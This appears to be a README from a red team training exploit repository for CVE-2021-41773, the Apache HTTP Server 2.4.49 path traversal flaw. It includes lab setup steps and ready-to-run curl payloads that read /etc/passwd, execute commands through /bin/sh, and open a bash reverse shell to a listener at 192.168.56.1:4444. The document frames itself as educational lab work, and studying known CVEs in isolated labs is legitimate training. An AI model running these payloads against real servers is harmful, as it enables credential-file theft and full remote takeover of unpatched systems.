Share
## https://sploitus.com/exploit?id=20966067-9A09-5AEF-9BF3-B9B10992C9F5
# CVE-2021-41773 โ€” Apache HTTP Server 2.4.49 Path Traversal / RCE

**ITSOLERA Cybersecurity Department โ€” Red Team Task #3**  
**Team: Offensive Team Zeta**  
**Date: 18th March 2026**  

---

## โš ๏ธ Disclaimer
This repository is for **educational purposes only**.  
All testing was performed in an **isolated local Docker lab**.  
Never use against live, production, or third-party systems.

---

## CVE Summary
| Field | Detail |
|---|---|
| CVE ID | CVE-2021-41773 |
| CVSS | 9.8 CRITICAL |
| Affected | Apache HTTP Server 2.4.49 ONLY |
| Type | Path Traversal + Remote Code Execution |
| Fixed In | Apache 2.4.51 |

---

## Repository Contents
| File | Description |
|---|---|
| `poc_41773.py` | Python PoC exploit script with Team Zeta banner |
| `docker-compose.yml` | Vulnerable lab environment setup |
| `offensive_zeta_shell.txt` | Live session log โ€” proof of exploitation |
| `screenshots/` | Evidence screenshots |
| `Offensive_Team_Zeta_FINAL_Report.pdf` | Full exploitation report |

---

## Lab Setup
```bash
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# Start the lab
docker-compose up -d

# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49
```

## Exploitation
```bash
# File read via path traversal
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# Remote code execution
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
```

## References
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://www.exploit-db.com/exploits/50383
- https://httpd.apache.org/security/vulnerabilities_24.html